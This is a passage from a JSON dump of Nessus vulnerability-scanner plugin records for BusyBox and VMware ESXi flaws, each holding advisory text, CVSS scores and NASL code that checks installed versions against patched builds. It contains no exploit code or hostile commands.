BusyBox. This allows an attacker to execute\n arbitrary code, write arbitrary files, or conduct other\n attacks. (CVE-2017-16544)\n\n - An information disclosure vulnerability caused by\n insufficient session expiration. This allows an\n attacker with physical access or the ability to mimic\n a websocket connection to a user's browser to control\n a VM console after the user's session has expired or\n they have logged out. (CVE-2019-5531)\n\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2019-0013.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch as referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-16544\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/02\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\", \"Host/VMware/vsphere\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nfixes = make_array(\n '6.0', '14513180',\n '6.5', '13873656',\n '6.7', '12986307'\n);\n\nrel = get_kb_item_or_exit('Host/VMware/release');\nif ('ESXi' >!< rel) audit(AUDIT_OS_NOT, 'ESXi');\n\nver = get_kb_item_or_exit('Host/VMware/version');\nport = get_kb_item_or_exit('Host/VMware/vsphere');\n\nmatch = pregmatch(pattern:'^ESXi? ([0-9]+\\\\.[0-9]+).*$', string:ver);\nif (isnull(match)) audit(AUDIT_UNKNOWN_BUILD, 'VMware ESXi', '6.0 / 6.5 / 6.7');\nver = match[1];\n\nif (ver !~ '^6\\\\.(0|5|7)$') audit(AUDIT_OS_NOT, 'ESXi 6.0 / 6.5 / 6.7');\n\nfixed_build = int(fixes[ver]);\n\nif (empty_or_null(fixed_build)) audit(AUDIT_VER_FORMAT, ver);\n\nmatch = pregmatch(pattern:'^VMware ESXi.*build-([0-9]+)$', string:rel);\nif (isnull(match)) audit(AUDIT_UNKNOWN_BUILD, 'VMware ESXi', '6.0 / 6.5 / 6.7');\n\nbuild = int(match[1]);\n\nif (build >= fixed_build) audit(AUDIT_INST_VER_NOT_VULN, 'VMware ESXi', ver + ' build ' + build);\n\nreport = '\\n ESXi version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:19:55", "description": "a. VMware ESXi busybox command injection vulnerability\n\nESXi contains a command injection vulnerability due to the use of vulnerable version of busybox that does not sanitize filenames which may result into executing any escape sequence in the shell.\n\nAn attacker may exploit this issue by tricking an ESXi Admin into executing shell commands by providing a malicious file. \n\nb. ESXi Host Client information disclosure vulnerability\n\nAn information disclosure vulnerability in clients arising from insufficient session expiration.\n\nAn attacker with physical access or an ability to mimic a websocket connection to a users browser may be able to obtain control of a VM Console after the user has logged out or their session has timed out.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-09-18T00:00:00", "type": "nessus", "title": "VMSA-2019-0013 : Command injection and information disclosure vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-16544", "CVE-2019-5531"], "modified": "2019-12-27T00:00:00", "cpe": ["cpe:/o:vmware:esxi:6.0", "cpe:/o:vmware:esxi:6.5", "cpe:/o:vmware:esxi:6.7"], "id": "VMWARE_VMSA-2019-0013.NASL", "href": "https://www.tenable.com/plugins/nessus/128994", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2019-0013. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128994);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/12/27\");\n\n script_cve_id(\"CVE-2017-16544\", \"CVE-2019-5531\");\n script_xref(name:\"VMSA\", value:\"2019-0013\");\n script_xref(name:\"IAVA\", value:\"2019-A-0344\");\n\n script_name(english:\"VMSA-2019-0013 : Command injection and information disclosure vulnerabilities\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote VMware ESXi host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"a. VMware ESXi busybox command injection vulnerability\n\nESXi contains a command injection vulnerability due to the use of vulnerable version of busybox that does not sanitize filenames which may result into executing any escape sequence in the shell.\n\nAn attacker may exploit this issue by tricking an ESXi Admin into executing shell commands by providing a malicious file. \n\nb. ESXi Host Client information disclosure vulnerability\n\nAn information disclosure vulnerability in clients arising from insufficient session expiration.\n\nAn attacker with physical access or an ability to mimic a websocket connection to a users browser may be able to obtain control of a VM Console after the user has logged out or their session has timed out.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2019/000467.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:6.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:6.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2019-09-16\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESXi 6.0\", vib:\"VMware:esx-base:6.0.0-3.125.14475122\")) flag++;\nif (esx_check(ver:\"ESXi 6.0\", vib:\"VMware:esx-ui:1.30.0-9063842\")) flag++;\nif (esx_check(ver:\"ESXi 6.0\", vib:\"VMware:vsan:6.0.0-3.125.14292904\")) flag++;\nif (esx_check(ver:\"ESXi 6.0\", vib:\"VMware:vsanhealth:6.0.0-3000000.3.0.3.125.14292905\")) flag++;\n\nif (esx_check(ver:\"ESXi 6.5\", vib:\"VMware:esx-base:6.5.0-3.96.13932383\")) flag++;\nif (esx_check(ver:\"ESXi 6.5\", vib:\"VMware:esx-tboot:6.5.0-3.96.13932383\")) flag++;\nif (esx_check(ver:\"ESXi 6.5\", vib:\"VMware:esx-ui:1.31.0-10201673\")) flag++;\nif (esx_check(ver:\"ESXi 6.5\", vib:\"VMware:vsan:6.5.0-3.96.13371499\")) flag++;\nif (esx_check(ver:\"ESXi 6.5\", vib:\"VMware:vsanhealth:6.5.0-3.96.13530496\")) flag++;\n\nif (esx_check(ver:\"ESXi 6.7\", vib:\"VMware:esx-base:6.7.0-0.28.10176879\")) flag++;\nif (esx_check(ver:\"ESXi 6.7\", vib:\"VMware:esx-base:6.7.0-1.44.12986307\")) flag++;\nif (esx_check(ver:\"ESXi 6.7\", vib:\"VMware:esx-update:6.7.0-1.44.12986307\")) flag++;\nif (esx_check(ver:\"ESXi 6.7\", vib:\"VMware:vsan:6.7.0-0.28.10176879\")) flag++;\nif (esx_check(ver:\"ESXi 6.7\", vib:\"VMware:vsan:6.7.0-1.44.11399678\")) flag++;\nif (esx_check(ver:\"ESXi 6.7\", vib:\"VMware:vsanhealth:6.7.0-0.28.10176879\")) flag++;\nif (esx_check(ver:\"ESXi 6.7\", vib:\"VMware:vsanhealth:6.7.0-1.44.11399680\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:esx_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:33:40", "description": "The remote host is affected by the vulnerability described in GLSA-201803-12 (BusyBox: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in BusyBox. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, or have other unspecified impacts.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-27T00:00:00", "type": "nessus", "title": "GLSA-201803-12 : BusyBox: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-15873", "CVE-2017-15874", "CVE-2017-16544"], "modified": "2018-09-04T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:busybox", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201803-12.NASL", "href": "https://www.tenable.com/plugins/nessus/108627", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201803-12.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108627);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/09/04 13:20:07\");\n\n script_cve_id(\"CVE-2017-15873\", \"CVE-2017-15874\", \"CVE-2017-16544\");\n script_xref(name:\"GLSA\", value:\"201803-12\");\n\n script_name(english:\"GLSA-201803-12 : BusyBox: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201803-12\n(BusyBox: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in BusyBox. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, or have\n other unspecified impacts.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201803-12\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All BusyBox users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-apps/busybox-1.28.0'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:busybox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"sys-apps/busybox\", unaffected:make_list(\"ge 1.28.0\"), vulnerable:make_list(\"lt 1.28.0\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"BusyBox\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:28:58", "description": "Tyler Hicks discovered that BusyBox incorrectly handled symlinks inside tar archives. If a user or automated system were tricked into processing a specially crafted tar archive, a remote attacker could overwrite arbitrary files outside of the current directory. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2011-5325)\n\nMathias Krause discovered that BusyBox incorrectly handled kernel module loading restrictions. A local attacker could possibly use this issue to bypass intended restrictions. This issue only affected Ubuntu 14.04 LTS. (CVE-2014-9645)\n\nIt was discovered that BusyBox incorrectly handled certain ZIP archives. If a user or automated system were tricked into processing a specially crafted ZIP archive, a remote attacker could cause BusyBox to crash, leading to a denial of service. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2015-9261)\n\nNico Golde discovered that the BusyBox DHCP client incorrectly handled certain malformed domain names. A remote attacker could possibly use this issue to cause the DHCP client to crash, leading to a denial of service. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2016-2147)\n\nNico Golde discovered that the BusyBox DHCP client incorrectly handled certain 6RD options. A remote attacker could use this issue to cause the DHCP client to crash, leading to a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2016-2148)\n\nIt was discovered that BusyBox incorrectly handled certain bzip2 archives. If a user or automated system were tricked into processing a specially crafted bzip2 archive, a remote attacker could cause BusyBox to crash, leading to a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2017-15873)\n\nIt was discovered that BusyBox incorrectly handled tab completion. A local attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS.\n(CVE-2017-16544)\n\nIt was discovered that the BusyBox wget utility incorrectly handled certain responses. A remote attacker could use this issue to cause BusyBox to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2018-1000517)\n\nIt was discovered that the BusyBox DHCP utilities incorrectly handled certain memory operations. A remote attacker could possibly use this issue to access sensitive information. (CVE-2018-20679, CVE-2019-5747).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-04T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS / 18.10 : busybox vulnerabilities (USN-3935-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-5325", "CVE-2014-9645", "CVE-2015-9261", "CVE-2016-2147", "CVE-2016-2148", "CVE-2017-15873", "CVE-2017-16544", "CVE-2018-1000517", "CVE-2018-20679", "CVE-2019-5747"], "modified": "2019-09-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:busybox", "p-cpe:/a:canonical:ubuntu_linux:busybox-initramfs", "p-cpe:/a:canonical:ubuntu_linux:busybox-static", "p-cpe:/a:canonical:ubuntu_linux:udhcpc", "p-cpe:/a:canonical:ubuntu_linux:udhcpd", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.10"], "id": "UBUNTU_USN-3935-1.NASL", "href": "https://www.tenable.com/plugins/nessus/123751", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3935-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123751);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/09/18 12:31:49\");\n\n script_cve_id(\"CVE-2011-5325\", \"CVE-2014-9645\", \"CVE-2015-9261\", \"CVE-2016-2147\", \"CVE-2016-2148\", \"CVE-2017-15873\", \"CVE-2017-16544\", \"CVE-2018-1000517\", \"CVE-2018-20679\", \"CVE-2019-5747\");\n script_xref(name:\"USN\", value:\"3935-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS / 18.10 : busybox vulnerabilities (USN-3935-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tyler Hicks discovered that BusyBox incorrectly handled symlinks\ninside tar archives. If a user or automated system were tricked into\nprocessing a specially crafted tar archive, a remote attacker could\noverwrite arbitrary files outside of the current directory. This issue\nonly affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2011-5325)\n\nMathias Krause discovered that BusyBox incorrectly handled kernel\nmodule loading restrictions. A local attacker could possibly use this\nissue to bypass intended restrictions. This issue only affected Ubuntu\n14.04 LTS. (CVE-2014-9645)\n\nIt was discovered that BusyBox incorrectly handled certain ZIP\narchives. If a user or automated system were tricked into processing a\nspecially crafted ZIP archive, a remote attacker could cause BusyBox\nto crash, leading to a denial of service. This issue only affected\nUbuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2015-9261)\n\nNico Golde discovered that the BusyBox DHCP client incorrectly handled\ncertain malformed domain names. A remote attacker could possibly use\nthis issue to cause the DHCP client to crash, leading to a denial of\nservice. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04\nLTS. (CVE-2016-2147)\n\nNico Golde discovered that the BusyBox DHCP client incorrectly handled\ncertain 6RD options. A remote attacker could use this issue to cause\nthe DHCP client to crash, leading to a denial of service, or possibly\nexecute arbitrary code. This issue only affected Ubuntu 14.04 LTS and\nUbuntu 16.04 LTS. (CVE-2016-2148)\n\nIt was discovered that BusyBox incorrectly handled certain bzip2\narchives. If a user or automated system were tricked into processing a\nspecially crafted bzip2 archive, a remote attacker could cause BusyBox\nto crash, leading to a denial of service, or possibly execute\narbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu\n16.04 LTS. (CVE-2017-15873)\n\nIt was discovered that BusyBox incorrectly handled tab completion. A\nlocal attacker could possibly use this issue to execute arbitrary\ncode. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS.\n(CVE-2017-16544)\n\nIt was discovered that the BusyBox wget utility incorrectly handled\ncertain responses. A remote attacker could use this issue to cause\nBusyBox to crash, resulting in a denial of service, or possibly\nexecute arbitrary code. (CVE-2018-1000517)\n\nIt was discovered that the BusyBox DHCP utilities incorrectly handled\ncertain memory operations. A remote attacker could possibly use this\nissue to access sensitive information. (CVE-2018-20679, CVE-2019-5747).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3935-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:busybox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:busybox-initramfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:busybox-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:udhcpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:udhcpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019 Canonical, Inc. / NASL script (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|18\\.04|18\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 18.04 / 18.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"busybox\", pkgver:\"1:1.21.0-1ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"busybox-initramfs\", pkgver:\"1:1.21.0-1ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"busybox-static\", pkgver:\"1:1.21.0-1ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"udhcpc\", pkgver:\"1:1.21.0-1ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"udhcpd\", pkgver:\"1:1.21.0-1ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"busybox\", pkgver:\"1:1.22.0-15ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"busybox-initramfs\", pkgver:\"1:1.22.0-15ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"busybox-static\", pkgver:\"1:1.22.0-15ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"udhcpc\", pkgver:\"1:1.22.0-15ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"udhcpd\", pkgver:\"1:1.22.0-15ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"busybox\", pkgver:\"1:1.27.2-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"busybox-initramfs\", pkgver:\"1:1.27.2-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"busybox-static\", pkgver:\"1:1.27.2-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"udhcpc\", pkgver:\"1:1.27.2-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"udhcpd\", pkgver:\"1:1.27.2-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"busybox\", pkgver:\"1:1.27.2-2ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"busybox-initramfs\", pkgver:\"1:1.27.2-2ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"busybox-static\", pkgver:\"1:1.27.2-2ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"udhcpc\", pkgver:\"1:1.27.2-2ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"udhcpd\", pkgver:\"1:1.27.2-2ubuntu4.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"busybox / busybox-initramfs / busybox-static / udhcpc / udhcpd\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-19T19:51:40", "description": "Busybox, utility programs for small and embedded systems, was affected by several security vulnerabilities. The Common Vulnerabilities and Exposures project identifies the following issues.\n\nCVE-2011-5325\n\nA path traversal vulnerability was found in Busybox implementation of tar. tar will extract a symlink that points outside of the current working directory and then follow that symlink when extracting other files. This allows for a directory traversal attack when extracting untrusted tarballs.\n\nCVE-2013-1813\n\nWhen device node or symlink in /dev should be created inside 2-or-deeper 